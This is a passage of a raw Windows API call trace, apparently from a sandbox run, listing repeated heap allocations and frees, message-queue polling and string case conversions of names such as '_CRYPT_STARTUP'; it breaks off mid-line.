RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e98 [0192.334] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50848 [0192.334] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50920 [0192.334] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e38 [0192.334] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54288 [0192.334] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50938 [0192.334] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e08 [0192.334] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50980 [0192.334] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506c8 [0192.334] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50908 | out: hHeap=0x970000) returned 1 [0192.334] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0192.334] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50848 | out: hHeap=0x970000) returned 1 [0192.334] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0192.334] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e542d8 [0192.334] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d38 [0192.334] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0192.335] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e542d8 | out: hHeap=0x970000) returned 1 [0192.335] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0192.335] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50710 [0192.335] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78a50 [0192.335] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0192.335] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e98 [0192.335] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e80060 [0192.335] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ec8 [0192.335] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0192.335] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e80060 | out: hHeap=0x970000) returned 1 [0192.335] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0192.335] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50758 [0192.335] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78b28 [0192.335] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0192.335] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ec8 [0192.335] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ef8 [0192.335] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0192.335] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0192.335] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b28 | out: hHeap=0x970000) returned 1 [0192.335] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50758 | out: hHeap=0x970000) returned 1 [0192.335] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ec8 [0192.335] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69a28 [0192.335] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69a28 | out: hHeap=0x970000) returned 1 [0192.335] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0192.335] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0192.335] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77ac8 [0192.335] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0192.336] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77ac8 | out: hHeap=0x970000) returned 1 [0192.336] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0192.336] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e801b0 [0192.336] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e98 [0192.336] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0192.336] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e801b0 | out: hHeap=0x970000) returned 1 [0192.336] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0192.336] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50758 [0192.336] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78b28 [0192.336] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0192.336] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e98 [0192.336] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0192.336] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ec8 [0192.336] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0192.336] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0192.336] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b28 | out: hHeap=0x970000) returned 1 [0192.336] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50758 | out: hHeap=0x970000) returned 1 [0192.336] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0192.336] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e98 [0192.336] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0192.336] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78a50 | out: hHeap=0x970000) returned 1 [0192.336] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50710 | out: hHeap=0x970000) returned 1 [0192.336] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0192.336] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77a48 [0192.336] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0192.336] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d48 [0192.337] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e98 [0192.337] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69b88 [0192.337] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b88 | out: hHeap=0x970000) returned 1 [0192.337] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0192.337] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0192.337] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77a88 [0192.337] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0192.337] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77a88 | out: hHeap=0x970000) returned 1 [0192.337] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0192.337] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e98 [0192.337] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50758 [0192.337] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50710 [0192.337] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ec8 [0192.337] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7fce0 [0192.337] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d38 [0192.337] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0192.337] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7fce0 | out: hHeap=0x970000) returned 1 [0192.337] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0192.337] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50848 [0192.337] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78c00 [0192.337] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0192.337] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ef8 [0192.337] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f08 [0192.337] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0192.337] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0192.337] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78c00 | out: hHeap=0x970000) returned 1 [0192.338] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50848 | out: hHeap=0x970000) returned 1 [0192.338] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0192.338] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50848 [0192.338] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ec8 [0192.338] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50908 [0192.338] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0192.338] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b30 [0192.338] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ec8 [0192.338] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a40 [0192.338] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0192.338] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a58 [0192.338] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ec8 [0192.338] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b48 [0192.338] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0192.338] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e542d8 [0192.338] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50758 | out: hHeap=0x970000) returned 1 [0192.338] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50758 [0192.338] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ec8 [0192.338] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0192.338] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b60 [0192.338] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f08 [0192.338] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509f8 [0192.338] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0192.338] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bc0 [0192.338] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d48 [0192.338] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0192.339] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b78 [0192.339] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ec8 [0192.339] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50aa0 [0192.339] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0192.339] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78618 [0192.339] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e542d8 | out: hHeap=0x970000) returned 1 [0192.339] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a10 [0192.339] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d48 [0192.339] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0192.339] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a70 [0192.339] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ec8 [0192.339] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b90 [0192.339] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0192.339] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bd8 [0192.339] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ec8 [0192.339] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0192.339] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c98 [0192.339] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ec8 [0192.339] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ba8 [0192.339] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0192.339] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ad0 [0192.339] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ec8 [0192.339] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0192.339] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b00 [0192.339] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ec8 [0192.339] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50cb0 [0192.340] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0192.340] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a88 [0192.340] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d58 [0192.340] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bf0 [0192.340] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c38 [0192.340] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ec8 [0192.340] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ef8 [0192.340] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x100000) returned 0x118e020 [0192.582] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0192.582] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x118e020 | out: hHeap=0x970000) returned 1 [0192.589] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0192.589] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c38 | out: hHeap=0x970000) returned 1 [0192.589] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bf0 | out: hHeap=0x970000) returned 1 [0192.589] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d58 | out: hHeap=0x970000) returned 1 [0192.589] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c20 [0192.589] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ec8 [0192.590] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ab8 [0192.590] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0192.590] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x80) returned 0x2e56430 [0192.590] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78618 | out: hHeap=0x970000) returned 1 [0192.590] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c80 [0192.590] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ec8 [0192.590] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0192.590] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ec8 [0192.590] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509e0 [0192.590] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0192.590] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509c8 [0192.590] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ef8 [0192.590] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f08 [0192.590] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a28 [0192.590] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509c8 | out: hHeap=0x970000) returned 1 [0192.590] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0192.590] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a28 | out: hHeap=0x970000) returned 1 [0192.591] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0192.591] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509c8 [0192.591] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ef8 [0192.591] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a28 [0192.591] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f08 [0192.591] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d18 [0192.591] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ae8 [0192.591] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a28 | out: hHeap=0x970000) returned 1 [0192.591] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0192.591] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ae8 | out: hHeap=0x970000) returned 1 [0192.591] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0192.591] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f08 [0192.591] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ae8 [0192.591] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d18 [0192.591] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d78 [0192.591] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b18 [0192.591] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ae8 | out: hHeap=0x970000) returned 1 [0192.591] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0192.591] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b18 | out: hHeap=0x970000) returned 1 [0192.591] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d78 | out: hHeap=0x970000) returned 1 [0192.591] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d18 [0192.591] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a28 [0192.592] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d68 [0192.592] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d28 [0192.592] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c38 [0192.592] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a28 | out: hHeap=0x970000) returned 1 [0192.592] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d68 | out: hHeap=0x970000) returned 1 [0192.592] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c38 | out: hHeap=0x970000) returned 1 [0192.592] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0192.592] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d28 [0192.592] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bf0 [0192.592] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d68 [0192.592] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d38 [0192.592] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ae8 [0192.592] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bf0 | out: hHeap=0x970000) returned 1 [0192.592] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d68 | out: hHeap=0x970000) returned 1 [0192.592] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ae8 | out: hHeap=0x970000) returned 1 [0192.592] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0192.592] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e542d8 [0192.592] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509c8 | out: hHeap=0x970000) returned 1 [0192.592] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d38 [0192.592] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c08 [0192.592] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d48 [0192.593] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d58 [0192.593] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c50 [0192.593] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c08 | out: hHeap=0x970000) returned 1 [0192.593] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0192.593] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c50 | out: hHeap=0x970000) returned 1 [0192.593] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d58 | out: hHeap=0x970000) returned 1 [0192.593] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d68 [0192.593] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c08 [0192.593] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d48 [0192.593] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d58 [0192.593] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ae8 [0192.593] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c08 | out: hHeap=0x970000) returned 1 [0192.593] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0192.593] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ae8 | out: hHeap=0x970000) returned 1 [0192.593] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d58 | out: hHeap=0x970000) returned 1 [0192.593] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d78 [0192.593] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a28 [0192.593] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d58 [0192.593] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d48 [0192.593] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ae8 [0192.593] HeapFree (in: hHeap=0x970000, 